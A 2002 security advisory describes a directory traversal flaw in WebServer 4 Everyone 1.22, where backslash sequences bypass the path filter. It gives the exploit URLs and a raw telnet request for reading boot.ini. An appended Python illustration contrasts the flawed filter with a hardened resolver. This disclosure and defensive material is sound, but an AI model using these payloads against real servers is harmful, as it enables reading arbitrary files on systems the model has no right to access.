advisory

From: UkR security team™ (cuctemaat_private)
Date: Thu Sep 05 2002 - 05:30:30 PDT


      -----------  UkR security team advisory  ------------
          WebServer 4 Everyone directory traversal bug
      -----------------------------------------------------
    
    Name:      WebServer 4 Everyone directory traversal bug
    Date:                                        28.08.2002
    Author:   UkR-XblP/ UkR security team/ http://ust.dp.ua
    Application:         WebServer 4 Everyone Version: 1.22 
    URL:                            http://www.freeware.lt/
    Risk: An attacker can read any file on the remote system
                   that the web server process has access to.
    About:   WebServer 4 Everyone is a commercial web server
                                  that runs on Win32 systems.
    Bug:  The server does not treat the backslash '\' (%5c)
           as a bad character when it filters requests for
           directory traversal, but the Win32 file system does
           treat '\' as a path separator. A request containing
           '\..' sequences therefore passes the filter, and the
           server follows the path in the URI out of the
           document root until it reaches the requested file.
    Exploits: 
          http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
                   or GET /\..\..\..\..\..\boot.ini HTTP/1.0
          The second form is a raw HTTP request that has to be
    sent with telnet, because some browsers rewrite or normalize
    the "\.." sequences before sending the request.
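The following is an added illustration, not code from the advisory or from the WebServer 4 Everyone product. It models a traversal filter that only knows about the forward-slash form "../" (the behaviour the advisory describes), shows how the advisory's %5c-encoded payload slips past it once Win32 folds '\' into '/', and contrasts it with a resolver that decodes, folds backslashes, normalizes against the document root and rejects anything that escapes it. The document root, the request strings and the function names are constructed for the example and are not taken from the product.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root for the demonstration (hypothetical, not the product's real path).
DOCROOT = "/srv/www"

# Constructed requests: the advisory's encoded payload, its raw telnet form, and a benign one.
ENCODED_PAYLOAD = "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini"
RAW_PAYLOAD = "/\\..\\..\\..\\..\\..\\boot.ini"
BENIGN_PATH = "/index.html"


def naive_blocks_traversal(decoded_uri):
    """Models a filter that only rejects the literal forward-slash form '../'.
    A backslash form '..\\' is not recognised, which is the bug in the advisory."""
    return "../" in decoded_uri


def naive_resolve(uri):
    """Return the file the vulnerable server would open for this request,
    or None if the (inadequate) filter rejects it."""
    decoded = unquote(uri)
    if naive_blocks_traversal(decoded):
        return None
    # Win32 file APIs accept '\\' and '/' interchangeably, so after the check has
    # already passed, the backslashes behave exactly like forward slashes.
    win32_view = decoded.replace("\\", "/")
    return posixpath.normpath(DOCROOT + win32_view)


def hardened_resolve(uri):
    """Decode (twice, to catch %255c-style double encoding), fold '\\' to '/',
    join onto DOCROOT, normalize, and refuse any result outside DOCROOT."""
    decoded = unquote(unquote(uri))
    if "\0" in decoded:
        # NUL bytes truncate C strings in the file API; never pass them through.
        return None
    folded = decoded.replace("\\", "/")
    full = posixpath.normpath(posixpath.join(DOCROOT, folded.lstrip("/")))
    if full != DOCROOT and not full.startswith(DOCROOT + "/"):
        return None
    return full


def raw_http_request(path, host="host"):
    """Build the exact request line the advisory says to send over telnet,
    bypassing any browser-side normalization of the '\\..' sequences."""
    return "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (path, host)


if __name__ == "__main__":
    for req in (ENCODED_PAYLOAD, RAW_PAYLOAD, "/../../../boot.ini", BENIGN_PATH):
        print("%-45s naive=%-20s hardened=%s" % (req, naive_resolve(req), hardened_resolve(req)))
    print(raw_http_request(RAW_PAYLOAD))
```

Running the block shows the forward-slash form "/../../../boot.ini" being blocked by the naive filter while the advisory's backslash form reaches "/boot.ini" outside the document root; the hardened resolver rejects both traversal forms and the double-encoded variant, and still serves the benign path.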
    
    Greetz:     2 Nadya Ostafiychuk - happy birthday !!! ;)
    ---
    Professional hosting for everyone - http://www.host.ru
    


